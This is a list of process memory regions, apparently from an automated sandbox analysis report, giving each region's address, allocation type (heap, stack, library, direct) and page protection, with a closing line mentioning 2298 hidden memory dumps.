1C10C000
stack
page read and write
27DF000
trusted library allocation
page read and write
5BAE000
stack
page read and write
57AB000
heap
page read and write
722000
heap
page read and write
3BF7000
direct allocation
page read and write
4ACE000
stack
page read and write
39B0000
heap
page read and write
4054000
heap
page read and write
7FE89A90000
trusted library allocation
page read and write
415000
heap
page read and write
1C329000
heap
page read and write
124D0000
trusted library allocation
page read and write
361D000
heap
page read and write
4480000
heap
page read and write
3B6D000
heap
page read and write
3B6D000
heap
page read and write
30B6000
heap
page read and write
4777000
heap
page read and write
73A000
heap
page read and write
57C3000
heap
page read and write
56DE000
stack
page read and write
16C000
heap
page read and write
5AF0000
heap
page read and write
3AEF000
heap
page read and write
1A62F000
heap
page read and write
405F000
heap
page read and write
3B6D000
heap
page read and write
40B3000
heap
page read and write
4777000
heap
page read and write
2E4000
heap
page read and write
20000
heap
page read and write
7FE8B2C0000
trusted library allocation
page read and write
3B6D000
heap
page read and write
40A7000
heap
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
58AF000
heap
page read and write
340A000
trusted library allocation
page read and write
5B2000
heap
page read and write
2268000
heap
page execute and read and write
361D000
heap
page read and write
1E14000
heap
page read and write
482000
unkown
page readonly
290F000
stack
page read and write
439E000
heap
page read and write
3B6D000
heap
page read and write
39B0000
heap
page read and write
495000
heap
page read and write
2B52000
trusted library allocation
page read and write
40A9000
heap
page read and write
480D000
stack
page read and write
4165000
heap
page read and write
1C910000
heap
page read and write
44E0000
trusted library allocation
page read and write
5706000
heap
page read and write
7FE8B324000
trusted library allocation
page read and write
3B6D000
heap
page read and write
468000
heap
page read and write
49AD000
heap
page read and write
4740000
heap
page read and write
27C5000
trusted library allocation
page read and write
1B5000
trusted library allocation
page execute and read and write
44DA000
heap
page read and write
4740000
heap
page read and write
3E50000
heap
page read and write
3AF0000
heap
page read and write
57DA000
heap
page read and write
4093000
heap
page read and write
3598000
heap
page read and write
4D8000
heap
page read and write
3BB5000
trusted library allocation
page read and write
490000
unkown
page write copy
361D000
heap
page read and write
7FE8B124000
trusted library allocation
page read and write
30B4000
heap
page read and write
33E4000
trusted library allocation
page read and write
3B65000
heap
page read and write
39B0000
heap
page read and write
F4E000
stack
page read and write
367A000
trusted library allocation
page read and write
361D000
heap
page read and write
3B6D000
heap
page read and write
369F000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
4062000
heap
page read and write
1C2D1000
heap
page read and write
2E80000
heap
page read and write
3E60000
heap
page read and write
369F000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
448B000
heap
page read and write
7FE8B1DC000
trusted library allocation
page execute and read and write
369F000
trusted library allocation
page read and write
1DB0000
direct allocation
page read and write
3E50000
heap
page read and write
3E50000
heap
page read and write
2B6E000
trusted library allocation
page read and write
3B6D000
heap
page read and write
41FD000
heap
page read and write
3AD000
heap
page read and write
3B6D000
heap
page read and write
423000
heap
page read and write
3B6D000
heap
page read and write
427000
heap
page read and write
353A000
trusted library allocation
page read and write
18D000
heap
page read and write
330000
heap
page read and write
4530000
heap
page read and write
305C000
heap
page read and write
478000
heap
page read and write
3B6D000
heap
page read and write
39DA000
direct allocation
page read and write
1AA000
trusted library allocation
page execute and read and write
369F000
trusted library allocation
page read and write
588B000
heap
page read and write
353D000
trusted library allocation
page read and write
39B000
heap
page read and write
2E80000
heap
page read and write
30B4000
heap
page read and write
62A000
heap
page read and write
40A3000
heap
page read and write
3B6D000
heap
page read and write
56ED000
stack
page read and write
2B0000
heap
page read and write
361D000
heap
page read and write
3E50000
heap
page read and write
2696000
trusted library allocation
page read and write
2433000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
3745000
heap
page read and write
420B000
heap
page read and write
4209000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
7FE8B240000
trusted library allocation
page execute and read and write
1AC00000
heap
page read and write
2E80000
heap
page read and write
369F000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
30D1000
heap
page read and write
1C23E000
stack
page read and write
373000
direct allocation
page read and write
47B000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
2E80000
heap
page read and write
495A000
heap
page read and write
7FE899A0000
trusted library allocation
page execute and read and write
1B54F000
stack
page read and write
3B6D000
heap
page read and write
585C000
heap
page read and write
39B0000
heap
page read and write
390000
direct allocation
page read and write
7FE8B3E0000
trusted library allocation
page read and write
427000
heap
page read and write
451000
heap
page read and write
369F000
trusted library allocation
page read and write
3B6D000
heap
page read and write
2AB000
trusted library allocation
page execute and read and write
41C3000
heap
page read and write
405C000
heap
page read and write
4AE000
heap
page read and write
664000
heap
page read and write
361D000
heap
page read and write
7FE89884000
trusted library allocation
page read and write
3091000
heap
page read and write
4096000
heap
page read and write
439000
heap
page read and write
39B0000
heap
page read and write
21C0000
heap
page read and write
4DF000
heap
page read and write
4062000
heap
page read and write
43B000
heap
page read and write
374C000
heap
page read and write
27DF000
trusted library allocation
page read and write
1C9FB000
stack
page read and write
27AB000
trusted library allocation
page read and write
7FE8B1D6000
trusted library allocation
page read and write
27DF000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
275B000
trusted library allocation
page read and write
3AEA000
heap
page read and write
43A5000
heap
page read and write
312F000
heap
page read and write
3AE8000
heap
page read and write
1A6F9000
stack
page read and write
40A7000
heap
page read and write
4740000
heap
page read and write
353D000
trusted library allocation
page read and write
361D000
heap
page read and write
21C0000
heap
page read and write
2B4B000
trusted library allocation
page read and write
3BB0000
trusted library allocation
page read and write
382D000
heap
page read and write
43EE000
stack
page read and write
12361000
trusted library allocation
page read and write
423000
heap
page read and write
3F57000
direct allocation
page read and write
7FE89BC0000
trusted library allocation
page read and write
382D000
heap
page read and write
3AF0000
heap
page read and write
3AF0000
heap
page read and write
361D000
heap
page read and write
2B0000
heap
page read and write
4946000
heap
page read and write
4E30000
heap
page read and write
41C2000
heap
page read and write
3B00000
direct allocation
page read and write
1C10000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
43A6000
heap
page read and write
27A9000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
47C000
heap
page read and write
367A000
trusted library allocation
page read and write
3D50000
trusted library allocation
page read and write
3B6D000
heap
page read and write
4063000
heap
page read and write
4F4E000
stack
page read and write
40AD000
heap
page read and write
2B68000
trusted library allocation
page read and write
3AF0000
heap
page read and write
488000
heap
page read and write
4094000
heap
page read and write
1AE3E000
stack
page read and write
4090000
heap
page read and write
40AB000
heap
page read and write
39DA000
direct allocation
page read and write
382D000
heap
page read and write
495000
heap
page read and write
5B6E000
stack
page read and write
1B380000
heap
page read and write
7FE8B122000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
There are 2298 hidden memdumps, click here to show them.